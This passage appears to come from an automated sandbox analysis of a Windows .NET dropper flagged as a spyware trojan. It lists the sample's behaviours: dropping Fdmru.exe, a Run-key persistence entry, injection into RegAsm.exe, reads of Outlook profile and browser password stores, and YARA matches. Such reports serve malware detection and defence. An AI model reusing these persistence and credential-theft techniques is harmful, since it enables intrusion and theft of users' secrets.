                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile created: C:\Users\user\AppData\Roaming\CcxsxJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d0nmbdt.wyd.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/14@3/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: tmp3354.tmp.tmpdb.16.dr, tmpC1FC.tmp.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdb source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 16.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.7cdfeec.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.619906985.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.630141577.000000000AD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.620597742.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.289147752.0000000008EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.504811512.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe PID: 5792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, Form2.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Fdmru.exe.0.dr, Form2.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.8e0000.0.unpack, Form2.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_0120F1B8 push C4012127h; iretd
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_0120A7A5 pushfd ; retf
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_0120A78D pushfd ; retf
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 0_2_01209620 push D40902EBh; retf
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: 0xC1D21F41 [Mon Jan 16 06:20:49 2073 UTC]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeFile created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FdmruJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FdmruJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
